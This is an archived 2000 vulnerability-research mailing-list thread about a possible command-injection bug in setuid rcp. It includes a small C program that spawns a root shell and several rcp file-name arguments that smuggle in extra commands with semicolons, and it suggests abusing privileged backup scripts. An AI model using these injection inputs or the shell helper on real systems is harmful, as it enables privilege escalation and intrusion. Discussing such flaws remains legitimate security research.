Vulnerability Development mailing list archives
Re: possible rcp hole...
From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Wed, 22 Nov 2000 00:05:32 -0600
On SuSE 6.4 rcp is not vulnerable. I replaced /bin/sh with this program: --- ubersh.c --- #include <stdio.h> #include <stdlib.h> int main (int argc, char **argv) { setuid(0); seteuid(0); setreuid(0); execl("/bin/bash", "uber shell", "-i", NULL); printf("exiting root shell...\n"); return 0; } -------------- The rcp program executed my shell with: $ rcp 'file1 file2;' 127.0.0.1 Which dopped me into the ubersh, where my privs were still that of my user account. I am pretty sure rcp drops privs before calling anything (only uses it for the port bindings), let alone system, or we would have heard something about this before. This is still a cool hole if you can find some custom/scripted system that does rcp backups from user-writable directories. You could gain access as whatever user the backups ran as (likely to be priviledged). -HD http://www.digitaldefense.net http://www.digitaloffense.net On Tuesday 21 November 2000 04:11 pm, Andrew Griffiths wrote:
Here is a possible bug in rcp; since I think it calls system(). I haven't had much time to play with this, because exama are coming up. It is negated because system() calls /bin/cp which with the newer versions of bash, it drops it's effective credientals... $ ls -alF `which rcp` -rwsr-xr-x 1 root root 14492 Jul 21 22:43 /usr/sbin/rcp $ cd /tmp $ echo bla > bob $ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1 uid=500(andrewg) gid=500(andrewg) groups=500(andrewg) sh: 127.0.0.1: command not found. Now doing a quick ltrace - it doesn't remove ; and ` and other fun stuff. This could probably be exploited, on older bash bersions?
Current thread:
- possible rcp hole... Andrew Griffiths (Nov 22)
- Re: possible rcp hole... Luciano Miguel Ferreira Rocha (Nov 23)
- Re: possible rcp hole... H D Moore (Nov 25)
- Re: possible rcp hole... Joe (Nov 27)